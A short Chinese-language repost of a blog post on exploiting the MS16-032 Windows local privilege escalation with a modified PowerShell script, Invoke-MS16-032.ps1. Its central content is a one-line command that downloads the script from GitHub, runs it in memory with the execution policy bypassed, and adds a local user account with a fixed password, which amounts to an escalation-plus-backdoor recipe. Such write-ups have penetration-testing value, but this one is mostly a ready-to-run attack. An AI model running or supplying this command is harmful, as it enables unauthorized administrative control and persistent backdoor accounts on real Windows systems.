MS16-032 windows本地提权

华盟原创文章投稿奖励计划

exploit-db的详情:
      https://www.exploit-db.com/exploits/39574/

试用系统:

Tested on x32 Win7, x64 Win8, x64 2k12R2

提权powershell脚本:

Invoke-MS16-032.ps1

测试详情:

为了方便使用,对这个脚本进行了简单的修改,可以执行任意程序,并可以添加参数执行(全程无弹框)脚本地址为:

Invoke-MS16-032.ps1

使用方式如下:


      添加用户:

运行某程序:

远程加用户:

直接执行如下命令,可进行提权并添加用户:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"

演示如下:

文章出处:Evi1cg's blog   

https://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html

本文来源Evi1cg's blog,经授权后由congtou发布,观点不代表华盟网的立场,转载请联系原作者。

发表评论